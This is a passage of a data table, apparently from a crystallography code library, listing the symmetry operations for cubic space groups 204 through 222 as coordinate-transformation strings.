'-z+1/2,-x,-y+1/2', '-z+1/2,x+1/4,y+3/4', 'z+3/4,x+1/4,-y+1/2', 'z+3/4,-x,y+3/4', '-y+1/2,-z,-x+1/2',
'y+3/4,-z,x+3/4', '-y+1/2,z+1/4,x+3/4', 'y+3/4,z+1/4,-x+1/2', 'x+1/2,y+1/2,z', '-x+1/4,-y+1/4,z',
'-x+1/4,y+1/2,-z+3/4', 'x+1/2,-y+1/4,-z+3/4', 'z+1/2,x+1/2,y', 'z+1/2,-x+1/4,-y+3/4', '-z+1/4,-x+1/4,y',
'-z+1/4,x+1/2,-y+3/4', 'y+1/2,z+1/2,x', '-y+1/4,z+1/2,-x+3/4', 'y+1/2,-z+1/4,-x+3/4', '-y+1/4,-z+1/4,x',
'-x+1/2,-y+1/2,-z', 'x+3/4,y+3/4,-z', 'x+3/4,-y+1/2,z+1/4', '-x+1/2,y+3/4,z+1/4', '-z+1/2,-x+1/2,-y',
'-z+1/2,x+3/4,y+1/4', 'z+3/4,x+3/4,-y', 'z+3/4,-x+1/2,y+1/4', '-y+1/2,-z+1/2,-x', 'y+3/4,-z+1/2,x+1/4',
'-y+1/2,z+3/4,x+1/4', 'y+3/4,z+3/4,-x'],
204: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y', 'z,x,-y', 'z,-x,y',
'-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z+1/2,-x+1/2,-y+1/2',
'-z+1/2,-x+1/2,y+1/2', '-z+1/2,x+1/2,-y+1/2', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z+1/2,-x+1/2',
'y+1/2,-z+1/2,-x+1/2', '-y+1/2,-z+1/2,x+1/2', '-x+1/2,-y+1/2,-z+1/2', 'x+1/2,y+1/2,-z+1/2',
'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2', '-z+1/2,-x+1/2,-y+1/2', '-z+1/2,x+1/2,y+1/2',
'z+1/2,x+1/2,-y+1/2', 'z+1/2,-x+1/2,y+1/2', '-y+1/2,-z+1/2,-x+1/2', 'y+1/2,-z+1/2,x+1/2',
'-y+1/2,z+1/2,x+1/2', 'y+1/2,z+1/2,-x+1/2'],
205: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'-x,-y,-z', 'x+1/2,y,-z+1/2', 'x,-y+1/2,z+1/2', '-x+1/2,y+1/2,z', '-z,-x,-y', '-z+1/2,x+1/2,y',
'z+1/2,x,-y+1/2', 'z,-x+1/2,y+1/2', '-y,-z,-x', 'y,-z+1/2,x+1/2', '-y+1/2,z+1/2,x', 'y+1/2,z,-x+1/2'],
206: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'-x,-y,-z', 'x+1/2,y,-z+1/2', 'x,-y+1/2,z+1/2', '-x+1/2,y+1/2,z', '-z,-x,-y', '-z+1/2,x+1/2,y',
'z+1/2,x,-y+1/2', 'z,-x+1/2,y+1/2', '-y,-z,-x', 'y,-z+1/2,x+1/2', '-y+1/2,z+1/2,x', 'y+1/2,z,-x+1/2',
'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-x+1/2,y,-z', 'x,-y,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z,-x,-y+1/2',
'-z,-x+1/2,y', '-z+1/2,x,-y', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z,-x', 'y,-z,-x+1/2', '-y,-z+1/2,x',
'-x+1/2,-y+1/2,-z+1/2', 'x,y+1/2,-z', 'x+1/2,-y,z', '-x,y,z+1/2', '-z+1/2,-x+1/2,-y+1/2', '-z,x,y+1/2',
'z,x+1/2,-y', 'z+1/2,-x,y', '-y+1/2,-z+1/2,-x+1/2', 'y+1/2,-z,x', '-y,z,x+1/2', 'y,z+1/2,-x'],
207: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,-z', '-y,-x,-z', 'y,-x,z', '-y,x,z', 'x,z,-y', '-x,z,y', '-x,-z,-y', 'x,-z,y',
'z,y,-x', 'z,-y,x', '-z,y,x', '-z,-y,-x'],
208: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', 'y+1/2,-x+1/2,z+1/2',
'-y+1/2,x+1/2,z+1/2', 'x+1/2,z+1/2,-y+1/2', '-x+1/2,z+1/2,y+1/2', '-x+1/2,-z+1/2,-y+1/2',
'x+1/2,-z+1/2,y+1/2', 'z+1/2,y+1/2,-x+1/2', 'z+1/2,-y+1/2,x+1/2', '-z+1/2,y+1/2,x+1/2',
'-z+1/2,-y+1/2,-x+1/2'],
209: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,-z', '-y,-x,-z', 'y,-x,z', '-y,x,z', 'x,z,-y', '-x,z,y', '-x,-z,-y', 'x,-z,y',
'z,y,-x', 'z,-y,x', '-z,y,x', '-z,-y,-x', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2',
'x,-y+1/2,-z+1/2', 'z,x+1/2,y+1/2', 'z,-x+1/2,-y+1/2', '-z,-x+1/2,y+1/2', '-z,x+1/2,-y+1/2',
'y,z+1/2,x+1/2', '-y,z+1/2,-x+1/2', 'y,-z+1/2,-x+1/2', '-y,-z+1/2,x+1/2', 'y,x+1/2,-z+1/2',
'-y,-x+1/2,-z+1/2', 'y,-x+1/2,z+1/2', '-y,x+1/2,z+1/2', 'x,z+1/2,-y+1/2', '-x,z+1/2,y+1/2',
'-x,-z+1/2,-y+1/2', 'x,-z+1/2,y+1/2', 'z,y+1/2,-x+1/2', 'z,-y+1/2,x+1/2', '-z,y+1/2,x+1/2',
'-z,-y+1/2,-x+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x+1/2,-y,-z+1/2',
'z+1/2,x,y+1/2', 'z+1/2,-x,-y+1/2', '-z+1/2,-x,y+1/2', '-z+1/2,x,-y+1/2', 'y+1/2,z,x+1/2',
'-y+1/2,z,-x+1/2', 'y+1/2,-z,-x+1/2', '-y+1/2,-z,x+1/2', 'y+1/2,x,-z+1/2', '-y+1/2,-x,-z+1/2',
'y+1/2,-x,z+1/2', '-y+1/2,x,z+1/2', 'x+1/2,z,-y+1/2', '-x+1/2,z,y+1/2', '-x+1/2,-z,-y+1/2',
'x+1/2,-z,y+1/2', 'z+1/2,y,-x+1/2', 'z+1/2,-y,x+1/2', '-z+1/2,y,x+1/2', '-z+1/2,-y,-x+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'z+1/2,x+1/2,y',
'z+1/2,-x+1/2,-y', '-z+1/2,-x+1/2,y', '-z+1/2,x+1/2,-y', 'y+1/2,z+1/2,x', '-y+1/2,z+1/2,-x',
'y+1/2,-z+1/2,-x', '-y+1/2,-z+1/2,x', 'y+1/2,x+1/2,-z', '-y+1/2,-x+1/2,-z', 'y+1/2,-x+1/2,z',
'-y+1/2,x+1/2,z', 'x+1/2,z+1/2,-y', '-x+1/2,z+1/2,y', '-x+1/2,-z+1/2,-y', 'x+1/2,-z+1/2,y',
'z+1/2,y+1/2,-x', 'z+1/2,-y+1/2,x', '-z+1/2,y+1/2,x', '-z+1/2,-y+1/2,-x'],
210: ['x,y,z', '-x,-y+1/2,z+1/2', '-x+1/2,y+1/2,-z', 'x+1/2,-y,-z+1/2', 'z,x,y', 'z+1/2,-x,-y+1/2',
'-z,-x+1/2,y+1/2', '-z+1/2,x+1/2,-y', 'y,z,x', '-y+1/2,z+1/2,-x', 'y+1/2,-z,-x+1/2', '-y,-z+1/2,x+1/2',
'y+3/4,x+1/4,-z+3/4', '-y+1/4,-x+1/4,-z+1/4', 'y+1/4,-x+3/4,z+3/4', '-y+3/4,x+3/4,z+1/4',
'x+3/4,z+1/4,-y+3/4', '-x+3/4,z+3/4,y+1/4', '-x+1/4,-z+1/4,-y+1/4', 'x+1/4,-z+3/4,y+3/4',
'z+3/4,y+1/4,-x+3/4', 'z+1/4,-y+3/4,x+3/4', '-z+3/4,y+3/4,x+1/4', '-z+1/4,-y+1/4,-x+1/4',
'x,y+1/2,z+1/2', '-x,-y,z', '-x+1/2,y,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x+1/2,y+1/2', 'z+1/2,-x+1/2,-y',
'-z,-x,y', '-z+1/2,x,-y+1/2', 'y,z+1/2,x+1/2', '-y+1/2,z,-x+1/2', 'y+1/2,-z+1/2,-x', '-y,-z,x',
'y+3/4,x+3/4,-z+1/4', '-y+1/4,-x+3/4,-z+3/4', 'y+1/4,-x+1/4,z+1/4', '-y+3/4,x+1/4,z+3/4',
'x+3/4,z+3/4,-y+1/4', '-x+3/4,z+1/4,y+3/4', '-x+1/4,-z+3/4,-y+3/4', 'x+1/4,-z+1/4,y+1/4',
'z+3/4,y+3/4,-x+1/4', 'z+1/4,-y+1/4,x+1/4', '-z+3/4,y+1/4,x+3/4', '-z+1/4,-y+3/4,-x+3/4',
'x+1/2,y,z+1/2', '-x+1/2,-y+1/2,z', '-x,y+1/2,-z+1/2', 'x,-y,-z', 'z+1/2,x,y+1/2', 'z,-x,-y',
'-z+1/2,-x+1/2,y', '-z,x+1/2,-y+1/2', 'y+1/2,z,x+1/2', '-y,z+1/2,-x+1/2', 'y,-z,-x', '-y+1/2,-z+1/2,x',
'y+1/4,x+1/4,-z+1/4', '-y+3/4,-x+1/4,-z+3/4', 'y+3/4,-x+3/4,z+1/4', '-y+1/4,x+3/4,z+3/4',
'x+1/4,z+1/4,-y+1/4', '-x+1/4,z+3/4,y+3/4', '-x+3/4,-z+1/4,-y+3/4', 'x+3/4,-z+3/4,y+1/4',
'z+1/4,y+1/4,-x+1/4', 'z+3/4,-y+3/4,x+1/4', '-z+1/4,y+3/4,x+3/4', '-z+3/4,-y+1/4,-x+3/4',
'x+1/2,y+1/2,z', '-x+1/2,-y,z+1/2', '-x,y,-z', 'x,-y+1/2,-z+1/2', 'z+1/2,x+1/2,y', 'z,-x+1/2,-y+1/2',
'-z+1/2,-x,y+1/2', '-z,x,-y', 'y+1/2,z+1/2,x', '-y,z,-x', 'y,-z+1/2,-x+1/2', '-y+1/2,-z,x+1/2',
'y+1/4,x+3/4,-z+3/4', '-y+3/4,-x+3/4,-z+1/4', 'y+3/4,-x+1/4,z+3/4', '-y+1/4,x+1/4,z+1/4',
'x+1/4,z+3/4,-y+3/4', '-x+1/4,z+1/4,y+1/4', '-x+3/4,-z+3/4,-y+1/4', 'x+3/4,-z+1/4,y+3/4',
'z+1/4,y+3/4,-x+3/4', 'z+3/4,-y+1/4,x+3/4', '-z+1/4,y+1/4,x+1/4', '-z+3/4,-y+3/4,-x+1/4'],
211: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,-z', '-y,-x,-z', 'y,-x,z', '-y,x,z', 'x,z,-y', '-x,z,y', '-x,-z,-y', 'x,-z,y',
'z,y,-x', 'z,-y,x', '-z,y,x', '-z,-y,-x', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z+1/2,-x+1/2,-y+1/2',
'-z+1/2,-x+1/2,y+1/2', '-z+1/2,x+1/2,-y+1/2', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z+1/2,-x+1/2',
'y+1/2,-z+1/2,-x+1/2', '-y+1/2,-z+1/2,x+1/2', 'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2',
'y+1/2,-x+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2', 'x+1/2,z+1/2,-y+1/2', '-x+1/2,z+1/2,y+1/2',
'-x+1/2,-z+1/2,-y+1/2', 'x+1/2,-z+1/2,y+1/2', 'z+1/2,y+1/2,-x+1/2', 'z+1/2,-y+1/2,x+1/2',
'-z+1/2,y+1/2,x+1/2', '-z+1/2,-y+1/2,-x+1/2'],
212: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'y+1/4,x+3/4,-z+3/4', '-y+1/4,-x+1/4,-z+1/4', 'y+3/4,-x+3/4,z+1/4', '-y+3/4,x+1/4,z+3/4',
'x+1/4,z+3/4,-y+3/4', '-x+3/4,z+1/4,y+3/4', '-x+1/4,-z+1/4,-y+1/4', 'x+3/4,-z+3/4,y+1/4',
'z+1/4,y+3/4,-x+3/4', 'z+3/4,-y+3/4,x+1/4', '-z+3/4,y+1/4,x+3/4', '-z+1/4,-y+1/4,-x+1/4'],
213: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'y+3/4,x+1/4,-z+1/4', '-y+3/4,-x+3/4,-z+3/4', 'y+1/4,-x+1/4,z+3/4', '-y+1/4,x+3/4,z+1/4',
'x+3/4,z+1/4,-y+1/4', '-x+1/4,z+3/4,y+1/4', '-x+3/4,-z+3/4,-y+3/4', 'x+1/4,-z+1/4,y+3/4',
'z+3/4,y+1/4,-x+1/4', 'z+1/4,-y+1/4,x+3/4', '-z+1/4,y+3/4,x+1/4', '-z+3/4,-y+3/4,-x+3/4'],
214: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'y+3/4,x+1/4,-z+1/4', '-y+3/4,-x+3/4,-z+3/4', 'y+1/4,-x+1/4,z+3/4', '-y+1/4,x+3/4,z+1/4',
'x+3/4,z+1/4,-y+1/4', '-x+1/4,z+3/4,y+1/4', '-x+3/4,-z+3/4,-y+3/4', 'x+1/4,-z+1/4,y+3/4',
'z+3/4,y+1/4,-x+1/4', 'z+1/4,-y+1/4,x+3/4', '-z+1/4,y+3/4,x+1/4', '-z+3/4,-y+3/4,-x+3/4',
'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-x+1/2,y,-z', 'x,-y,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z,-x,-y+1/2',
'-z,-x+1/2,y', '-z+1/2,x,-y', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z,-x', 'y,-z,-x+1/2', '-y,-z+1/2,x',
'y+1/4,x+3/4,-z+3/4', '-y+1/4,-x+1/4,-z+1/4', 'y+3/4,-x+3/4,z+1/4', '-y+3/4,x+1/4,z+3/4',
'x+1/4,z+3/4,-y+3/4', '-x+3/4,z+1/4,y+3/4', '-x+1/4,-z+1/4,-y+1/4', 'x+3/4,-z+3/4,y+1/4',
'z+1/4,y+3/4,-x+3/4', 'z+3/4,-y+3/4,x+1/4', '-z+3/4,y+1/4,x+3/4', '-z+1/4,-y+1/4,-x+1/4'],
215: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,z', '-y,-x,z', 'y,-x,-z', '-y,x,-z', 'x,z,y', '-x,z,-y', '-x,-z,y', 'x,-z,-y',
'z,y,x', 'z,-y,-x', '-z,y,-x', '-z,-y,x'],
216: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,z', '-y,-x,z', 'y,-x,-z', '-y,x,-z', 'x,z,y', '-x,z,-y', '-x,-z,y', 'x,-z,-y',
'z,y,x', 'z,-y,-x', '-z,y,-x', '-z,-y,x', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2',
'x,-y+1/2,-z+1/2', 'z,x+1/2,y+1/2', 'z,-x+1/2,-y+1/2', '-z,-x+1/2,y+1/2', '-z,x+1/2,-y+1/2',
'y,z+1/2,x+1/2', '-y,z+1/2,-x+1/2', 'y,-z+1/2,-x+1/2', '-y,-z+1/2,x+1/2', 'y,x+1/2,z+1/2',
'-y,-x+1/2,z+1/2', 'y,-x+1/2,-z+1/2', '-y,x+1/2,-z+1/2', 'x,z+1/2,y+1/2', '-x,z+1/2,-y+1/2',
'-x,-z+1/2,y+1/2', 'x,-z+1/2,-y+1/2', 'z,y+1/2,x+1/2', 'z,-y+1/2,-x+1/2', '-z,y+1/2,-x+1/2',
'-z,-y+1/2,x+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x+1/2,-y,-z+1/2',
'z+1/2,x,y+1/2', 'z+1/2,-x,-y+1/2', '-z+1/2,-x,y+1/2', '-z+1/2,x,-y+1/2', 'y+1/2,z,x+1/2',
'-y+1/2,z,-x+1/2', 'y+1/2,-z,-x+1/2', '-y+1/2,-z,x+1/2', 'y+1/2,x,z+1/2', '-y+1/2,-x,z+1/2',
'y+1/2,-x,-z+1/2', '-y+1/2,x,-z+1/2', 'x+1/2,z,y+1/2', '-x+1/2,z,-y+1/2', '-x+1/2,-z,y+1/2',
'x+1/2,-z,-y+1/2', 'z+1/2,y,x+1/2', 'z+1/2,-y,-x+1/2', '-z+1/2,y,-x+1/2', '-z+1/2,-y,x+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'z+1/2,x+1/2,y',
'z+1/2,-x+1/2,-y', '-z+1/2,-x+1/2,y', '-z+1/2,x+1/2,-y', 'y+1/2,z+1/2,x', '-y+1/2,z+1/2,-x',
'y+1/2,-z+1/2,-x', '-y+1/2,-z+1/2,x', 'y+1/2,x+1/2,z', '-y+1/2,-x+1/2,z', 'y+1/2,-x+1/2,-z',
'-y+1/2,x+1/2,-z', 'x+1/2,z+1/2,y', '-x+1/2,z+1/2,-y', '-x+1/2,-z+1/2,y', 'x+1/2,-z+1/2,-y',
'z+1/2,y+1/2,x', 'z+1/2,-y+1/2,-x', '-z+1/2,y+1/2,-x', '-z+1/2,-y+1/2,x'],
217: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,z', '-y,-x,z', 'y,-x,-z', '-y,x,-z', 'x,z,y', '-x,z,-y', '-x,-z,y', 'x,-z,-y',
'z,y,x', 'z,-y,-x', '-z,y,-x', '-z,-y,x', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z+1/2,-x+1/2,-y+1/2',
'-z+1/2,-x+1/2,y+1/2', '-z+1/2,x+1/2,-y+1/2', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z+1/2,-x+1/2',
'y+1/2,-z+1/2,-x+1/2', '-y+1/2,-z+1/2,x+1/2', 'y+1/2,x+1/2,z+1/2', '-y+1/2,-x+1/2,z+1/2',
'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2', 'x+1/2,z+1/2,y+1/2', '-x+1/2,z+1/2,-y+1/2',
'-x+1/2,-z+1/2,y+1/2', 'x+1/2,-z+1/2,-y+1/2', 'z+1/2,y+1/2,x+1/2', 'z+1/2,-y+1/2,-x+1/2',
'-z+1/2,y+1/2,-x+1/2', '-z+1/2,-y+1/2,x+1/2'],
218: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y+1/2,x+1/2,z+1/2', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,-x+1/2,-z+1/2',
'-y+1/2,x+1/2,-z+1/2', 'x+1/2,z+1/2,y+1/2', '-x+1/2,z+1/2,-y+1/2', '-x+1/2,-z+1/2,y+1/2',
'x+1/2,-z+1/2,-y+1/2', 'z+1/2,y+1/2,x+1/2', 'z+1/2,-y+1/2,-x+1/2', '-z+1/2,y+1/2,-x+1/2',
'-z+1/2,-y+1/2,x+1/2'],
219: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y+1/2,x+1/2,z+1/2', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,-x+1/2,-z+1/2',
'-y+1/2,x+1/2,-z+1/2', 'x+1/2,z+1/2,y+1/2', '-x+1/2,z+1/2,-y+1/2', '-x+1/2,-z+1/2,y+1/2',
'x+1/2,-z+1/2,-y+1/2', 'z+1/2,y+1/2,x+1/2', 'z+1/2,-y+1/2,-x+1/2', '-z+1/2,y+1/2,-x+1/2',
'-z+1/2,-y+1/2,x+1/2', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2', 'x,-y+1/2,-z+1/2',
'z,x+1/2,y+1/2', 'z,-x+1/2,-y+1/2', '-z,-x+1/2,y+1/2', '-z,x+1/2,-y+1/2', 'y,z+1/2,x+1/2',
'-y,z+1/2,-x+1/2', 'y,-z+1/2,-x+1/2', '-y,-z+1/2,x+1/2', 'y+1/2,x,z', '-y+1/2,-x,z', 'y+1/2,-x,-z',
'-y+1/2,x,-z', 'x+1/2,z,y', '-x+1/2,z,-y', '-x+1/2,-z,y', 'x+1/2,-z,-y', 'z+1/2,y,x', 'z+1/2,-y,-x',
'-z+1/2,y,-x', '-z+1/2,-y,x', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x+1/2,-y,-z+1/2',
'z+1/2,x,y+1/2', 'z+1/2,-x,-y+1/2', '-z+1/2,-x,y+1/2', '-z+1/2,x,-y+1/2', 'y+1/2,z,x+1/2',
'-y+1/2,z,-x+1/2', 'y+1/2,-z,-x+1/2', '-y+1/2,-z,x+1/2', 'y,x+1/2,z', '-y,-x+1/2,z', 'y,-x+1/2,-z',
'-y,x+1/2,-z', 'x,z+1/2,y', '-x,z+1/2,-y', '-x,-z+1/2,y', 'x,-z+1/2,-y', 'z,y+1/2,x', 'z,-y+1/2,-x',
'-z,y+1/2,-x', '-z,-y+1/2,x', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z',
'z+1/2,x+1/2,y', 'z+1/2,-x+1/2,-y', '-z+1/2,-x+1/2,y', '-z+1/2,x+1/2,-y', 'y+1/2,z+1/2,x',
'-y+1/2,z+1/2,-x', 'y+1/2,-z+1/2,-x', '-y+1/2,-z+1/2,x', 'y,x,z+1/2', '-y,-x,z+1/2', 'y,-x,-z+1/2',
'-y,x,-z+1/2', 'x,z,y+1/2', '-x,z,-y+1/2', '-x,-z,y+1/2', 'x,-z,-y+1/2', 'z,y,x+1/2', 'z,-y,-x+1/2',
'-z,y,-x+1/2', '-z,-y,x+1/2'],
220: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'y+1/4,x+1/4,z+1/4', '-y+1/4,-x+3/4,z+3/4', 'y+3/4,-x+1/4,-z+3/4', '-y+3/4,x+3/4,-z+1/4',
'x+1/4,z+1/4,y+1/4', '-x+3/4,z+3/4,-y+1/4', '-x+1/4,-z+3/4,y+3/4', 'x+3/4,-z+1/4,-y+3/4',
'z+1/4,y+1/4,x+1/4', 'z+3/4,-y+1/4,-x+3/4', '-z+3/4,y+3/4,-x+1/4', '-z+1/4,-y+3/4,x+3/4',
'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-x+1/2,y,-z', 'x,-y,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z,-x,-y+1/2',
'-z,-x+1/2,y', '-z+1/2,x,-y', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z,-x', 'y,-z,-x+1/2', '-y,-z+1/2,x',
'y+3/4,x+3/4,z+3/4', '-y+3/4,-x+1/4,z+1/4', 'y+1/4,-x+3/4,-z+1/4', '-y+1/4,x+1/4,-z+3/4',
'x+3/4,z+3/4,y+3/4', '-x+1/4,z+1/4,-y+3/4', '-x+3/4,-z+1/4,y+1/4', 'x+1/4,-z+3/4,-y+1/4',
'z+3/4,y+3/4,x+3/4', 'z+1/4,-y+3/4,-x+1/4', '-z+1/4,y+1/4,-x+3/4', '-z+3/4,-y+1/4,x+1/4'],
221: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,-z', '-y,-x,-z', 'y,-x,z', '-y,x,z', 'x,z,-y', '-x,z,y', '-x,-z,-y', 'x,-z,y',
'z,y,-x', 'z,-y,x', '-z,y,x', '-z,-y,-x', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y',
'z,x,-y', 'z,-x,y', '-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x', '-y,-x,z', 'y,x,z', '-y,x,-z', 'y,-x,-z',
'-x,-z,y', 'x,-z,-y', 'x,z,y', '-x,z,-y', '-z,-y,x', '-z,y,-x', 'z,-y,-x', 'z,y,x'],
222: ['x,y,z', '-x+1/2,-y+1/2,z', '-x+1/2,y,-z+1/2', 'x,-y+1/2,-z+1/2', 'z,x,y', 'z,-x+1/2,-y+1/2',
'-z+1/2,-x+1/2,y', '-z+1/2,x,-y+1/2', 'y,z,x', '-y+1/2,z,-x+1/2', 'y,-z+1/2,-x+1/2', '-y+1/2,-z+1/2,x',
'y,x,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', 'y,-x+1/2,z', '-y+1/2,x,z', 'x,z,-y+1/2', '-x+1/2,z,y',
'-x+1/2,-z+1/2,-y+1/2', 'x,-z+1/2,y', 'z,y,-x+1/2', 'z,-y+1/2,x', '-z+1/2,y,x', '-z+1/2,-y+1/2,-x+1/2',
'-x,-y,-z', 'x+1/2,y+1/2,-z', 'x+1/2,-y,z+1/2', '-x,y+1/2,z+1/2', '-z,-x,-y', '-z,x+1/2,y+1/2',
'z+1/2,x+1/2,-y', 'z+1/2,-x,y+1/2', '-y,-z,-x', 'y+1/2,-z,x+1/2', '-y,z+1/2,x+1/2', 'y+1/2,z+1/2,-x',
'-y,-x,z+1/2', 'y+1/2,x+1/2,z+1/2', '-y,x+1/2,-z', 'y+1/2,-x,-z', '-x,-z,y+1/2', 'x+1/2,-z,-y',
'x+1/2,z+1/2,y+1/2', '-x,z+1/2,-y', '-z,-y,x+1/2', '-z,y+1/2,-x', 'z+1/2,-y,-x', 'z+1/2,y+1/2,x+1/2'],
